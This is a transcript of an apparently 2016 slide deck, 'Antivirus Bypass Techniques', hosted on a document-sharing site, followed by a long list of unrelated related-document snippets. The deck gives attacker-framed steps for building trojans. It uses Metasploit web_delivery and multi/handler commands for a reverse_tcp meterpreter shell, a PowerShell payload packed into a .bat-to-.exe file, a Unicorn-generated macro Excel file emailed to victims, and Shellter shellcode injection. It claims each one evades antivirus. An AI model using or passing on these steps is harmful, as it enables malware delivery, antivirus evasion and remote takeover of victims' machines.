antivirus bypass techniques - 2016

14

Upload: raghav-bisht

Post on 16-Jan-2017

172 views

Category:

Internet

2 download

Report

Download

Embed Size (px):

TRANSCRIPT

Page 1: Antivirus Bypass Techniques - 2016

Page 2: Antivirus Bypass Techniques - 2016

2 | P a g e

A. Power Shell Exploitation1. Technique : Generating Executables (.exe & .bat) Files

Description :Attacker create a windows executable (.exe) program which acts as a Trojan. In this technique attacker generate a power shell command whose work is to create a webclient & embed the backdoor inside his executable program.

How : Attacker use Metasploit framework to generate power shell command.

use exploit/multi/script/web_delivery show targets set target 2 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <IP> set SRVHOST <Server IP> set URIPATH / exploit

After creating the link attackers only task is to run the command on victim computer so, for doing that attacker will create a batch file Eg. Notepad.bat

In Notepad.bat attacker write his code & embed the Evil Power Shell Command. Convert the .bat file to .exe & send to victim

Result :

Figure 1. Generating PowerShell Command

Page 3: Antivirus Bypass Techniques - 2016

3 | P a g e

Figure 2. Embedding & Conversion of backdoor to .exe

Figure 3. Virus Total Result For Both Files

Page 4: Antivirus Bypass Techniques - 2016

4 | P a g e

Figure 4. Victim Executing The Program

Figure 5. Attacker Getting Sessions

Page 5: Antivirus Bypass Techniques - 2016

5 | P a g e

B. Macros1. Technique : Generating Macros Enable (.xlsm) Files

Description :Attacker creates a encoded payload using tool name Unicorn and use that payload to generate a macro enable Microsoft excel file which acts as a Trojan. How :

Download & install Unicorn git clone https://github.com/trustedsec/unicorn.git cd unicorn python unicorn.py windows/meterpreter/reverse_tcp <Attacker IP> <Port For Listening> macro

Attacker use Metasploit framework & start handler Exploit. use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <IP> set PORT <PORT> exploit

Now use the generated payload and create micro enable excel file

Result :

Figure 6. Generate Payload with unicorn

Page 6: Antivirus Bypass Techniques - 2016

6 | P a g e

Figure 7. Attacker Machine Start Handler

Figure 8. Create a micro enable excel file with evil code

Page 7: Antivirus Bypass Techniques - 2016

7 | P a g e

Figure 9. Virus Total Result

Figure 10. Attaching Trojan With Email

Page 8: Antivirus Bypass Techniques - 2016

8 | P a g e

Figure 11. Send Trojan With Email On Different Email Vendors

Figure 12. Victim AV Bypass

Page 9: Antivirus Bypass Techniques - 2016

9 | P a g e

Figure 13. Victim Opens The File

Figure 14. Attacker Sessions

Page 10: Antivirus Bypass Techniques - 2016

10 | P a g e

C. Shellter Project1. Technique : Shellcode injection toolDescription :Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).The shellcode can be something yours or something generated through a framework, such as Metasploit.

Result :

Figure 15

Page 11: Antivirus Bypass Techniques - 2016

11 | P a g e

Figure 16

Page 12: Antivirus Bypass Techniques - 2016

12 | P a g e

Figure 17

Page 13: Antivirus Bypass Techniques - 2016

13 | P a g e

Figure 18

ESET NOD32 Antivirus - static2.esetstatic.comstatic2.esetstatic.com/fileadmin/Images/FR/Docs/eset_eav_9_quick...ESET NOD32 Antivirus contient en effet des composants qui pourraient

AVAST! antivirus Edition Professionnelle Version 4.8 Guidedownload339.avast.com/files/manuals/user-manual-pro-fre.pdf · avast! antivirus Edition Professionnelle version 4.8 – Guide

TM AntiVirus Norton

FILTRE BYPASS « T

AVG AntiVirus 2014 · AVG AntiVirus 2014 © 2013 © AVG Technologies CZ, s.r.o. Все права защищены. 1 Версия документа 2014.01 (04/09/2013)

Cat Sir Cover Bypass Fr

Bitdefender Antivirus Plus 2013

AVG ANTIVIRUS BUSINESS EDITION 2016 - Hermitage ......AVG® AntiVirus Business Edition 2016 vous offre un fonctionnement plus intelligent. Cette solution garantit la sécurité de

Présentation du problèmeaivm37.free.fr/BI/JT/JT078J_AmeliorationsModifsWindows.pdf · Suppression antivirus Question Je viens d’acheter un PC avec évidemment un antivirus payant

GUIDE DE DÉMARRAGE RAPIDE - ESET€¦ · Démarrage de ESET NOD32 Antivirus ESET NOD32 Antivirus commence à protéger votre ordinateur directement après l'installation. Il est

Qu’est-ce que - Réso 13 · Complications postopératoires non spéciﬁques identiques ... MINI BYPASS GASTRIQUE CŒLIOSCOPIQUE ... - En cas d’échec des autres techniques,

INSTALLATION ANTIVIRUS ACADEMIQUE KASPERSKYcache.media.education.gouv.fr/file/Numerique_educatif/56/8/... · Cliquer sur Sécurité des systèmes d'information Cliquer sur Antivirus

ESET NOD32 Antivirus 4download.eset.com/manuals/eset_eav_lin_4_quickstartguide_frc.pdf · Antivirus mettra le fichier en quarantaine et affichera une alerte. Démarrage d'ESET NOD32

Complications après bypass gastrique pour obésité

AVG AntiVirus Business Editionfiles-download.avg.com/doc/AVG_Anti-Virus_Business/...uma_fr_ltst_… · AVG AntiVirus Business Edition peut désormais jouer plusieurs rôles, chaque

Linux SMEP bypass techniques

Lutte Anti -Virus Limites des techniques de d étection et … · 2010. 10. 20. · Les antivirus ne sont que des logiciels … Certains bugs impactent la sécurité : – Mise en

AVAST! antivirus Edition Familiale Version 4.8 Guidedownload513.avast.com/files/manuals/user-manual-home-fre.pdfavast! antivirus Edition Familiale version 4.8 – Guide dutilisateur

NEWSLETTERvetochirbuttin.com/chirurgie_referee_veterinaire_Rhone...Chirurgie :! Mise en place d’un SUB (Subcutaneous Ureteral Bypass) Les autres techniques chirurgicales ont maintenant

Website Fr - Mini Bypass

Internet TM Security Norton...Norton Internet Security contient un programme antivirus. Si d'autres programmes antivirus sont installés sur l'ordinateur, une boîte de dialogue peut

Antivirus et entretien d’un ordinateur › ... › nouvellestechnologies › guideentretienetanti… · Certains antivirus ont une fonction de protection automatique que vous retrouverez

Skrining Senyawa-Senyawa Antivirus Dari Bahan Alam

Les parents... Antivirus des réseaux sociaux!

Nouveautés 06-07 réseau, architecture, câblage, antivirus

AVG AntiVirus 2015 User Manualaa-download.avg.com/.../avg_avc_uma_fr_2015_02.pdf5 1. Introduction Ce manuel de l'utilisateur constitue la documentation complète du produit AVG AntiVirus

ESET NOD32 Antivirus® 4 - actn.fr › commun › pdf › NOD32AV4.pdf · Antivirus, utilise de multiples méthodes de détection pour fournir la meilleure protection possible contre

Free Antivirus€¦ · Avira Free Antivirus - Manuel d’utilisation (Edition: 13 Dec. 2013) 8 1. Introduction Avec votre produit Avira, protégez votre ordinateur contre les virus,

Réussir facilement sa migration antivirus

AVAST! antivirus Edition Professionnelle Version 4.8 Guide3kernels.free.fr/divers/notices/user-manual-pro-fre.pdf · Avast! antivirus est utilisé dans environ 75 millions de maisons

NETTOYER ET SECURISER SON PC - mediatheque-mauguio … · Cloud, Moon Secure Antivirus, Rising antivirus, Adaware free internet security, Blink Personal Edition, FortiClient(TM) Endpoint

OSSIR - JSSI 2004 · Panorama des techniques de résistance aux antivirus (anti-AV) OSSIR - JSSI 2004 4 Mai 2004 Vanja Svajcer, Principal Virus Researcher

Guides pratiques Avast - antivirus

Antivirus Comparatifs

SOFSTARTERS DEMARREURS PROGRESSIFS · Contacteur Bypass : Le contacteur Bypass est utilisé lorsque le démarreur progressif a démarré et que le régime est stationnaire. Il est